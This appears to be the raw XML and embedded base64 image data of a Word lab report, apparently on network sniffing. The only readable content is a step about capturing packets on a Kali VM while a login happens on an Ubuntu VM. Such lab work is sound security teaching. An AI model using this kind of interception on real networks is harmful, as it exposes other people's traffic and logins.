vrmP/AJZxyVv/APCB+Hv+gTa/9+6K&#10;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pkwwMBBAAA7wsAAA4AAAAA&#10;AAAAAAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhACW5z6/NgwEAzYMBABQA&#10;AAAAAAAAAAAAAAAAagYAAGRycy9tZWRpYS9pbWFnZTEuanBnUEsBAi0AFAAGAAgAAAAhAJvemgHd&#10;AAAABQEAAA8AAAAAAAAAAAAAAAAAaYoBAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQA3&#10;ncEYugAAACEBAAAZAAAAAAAAAAAAAAAAAHOLAQBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsF&#10;BgAAAAAGAAYAfAEAAGSMAQAAAA==&#10;">
                <v:rect id="Rectangle 2808" o:spid="_x0000_s1188" style="position:absolute;left:59448;top:3254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08A271CC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2809" o:spid="_x0000_s1189" style="position:absolute;top:34192;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68030DD4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2822" o:spid="_x0000_s1190" type="#_x0000_t75" style="position:absolute;left:383;top:127;width:58737;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xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba4NA&#10;FITvgfyH5QV6S1Y92GCzCbWltIQeEpMf8HBfVeq+FXer1l+fLRRyHGbmG2Z3mEwrBupdY1lBvIlA&#10;EJdWN1wpuF7e1lsQziNrbC2Tgl9ycNgvFzvMtB35TEPhKxEg7DJUUHvfZVK6siaDbmM74uB92d6g&#10;D7KvpO5xDHDTyiSKUmmw4bBQY0cvNZXfxY9R8J4PpD/z9PX0qOPYDeXcHrtZqYfV9PwEwtPk7+H/&#10;9odWkGyTBP7ehCcg9zcAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAv/+OP8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;">
                  <v:imagedata r:id="rId60" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2823" o:spid="_x0000_s1191" style="position:absolute;left:256;width:58991;height:33394;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,333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mxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dasJA&#10;FITvhb7Dcgq9kboxokjqKiIKvWnx7wEO2WM2mj0bshsT394tFLwcZuYbZrHqbSXu1PjSsYLxKAFB&#10;nDtdcqHgfNp9zkH4gKyxckwKHuRhtXwbLDDTruMD3Y+hEBHCPkMFJoQ6k9Lnhiz6kauJo3dxjcUQ&#10;ZVNI3WAX4baSaZLMpMWS44LBmjaG8tuxtQpmQ7MZX7Xk4WS733W34vdn2rZKfbz36y8QgfrwCv+3&#10;v7WCdJ5O4O9NfAJy+QQAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCoS/fmxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,3339466r5899150,l5899150,,,,,3339466xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3339466"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="22744594"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697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02FF831A" wp14:editId="1F553325">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40327" name="Group 4032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40" name="Shape 497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41" name="Shape 497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42" name="Shape 497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43" name="Shape 497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44" name="Shape 497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27" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49745" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49746" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49747" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49748" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4974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2297E859" wp14:editId="38B9579E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40331" name="Group 4033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50" name="Shape 497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51" name="Shape 497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52" name="Shape 497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53" name="Shape 497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54" name="Shape 497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31" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49755" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49756" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49757" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49758" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4975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Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Start capturing packets on KALI VM and alongside open website on ubuntu VM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619E063F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="396309D9" wp14:editId="277DA9E4">
                <wp:extent cx="5986577" cy="3753380"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40326" name="Group 40326"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986577" cy="3753380"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986577" cy="3753380"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2814" name="Rectangle 2814"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236896"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3B8CB36D"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15" name="Rectangle 2815"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3401487"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="750CBDFE"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16" name="Rectangle 2816"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3604180"/>
                            <a:ext cx="952855" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5E42A0EE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve">Logged in </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="2817" name="Rectangle 2817"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="716229" y="3604180"/>
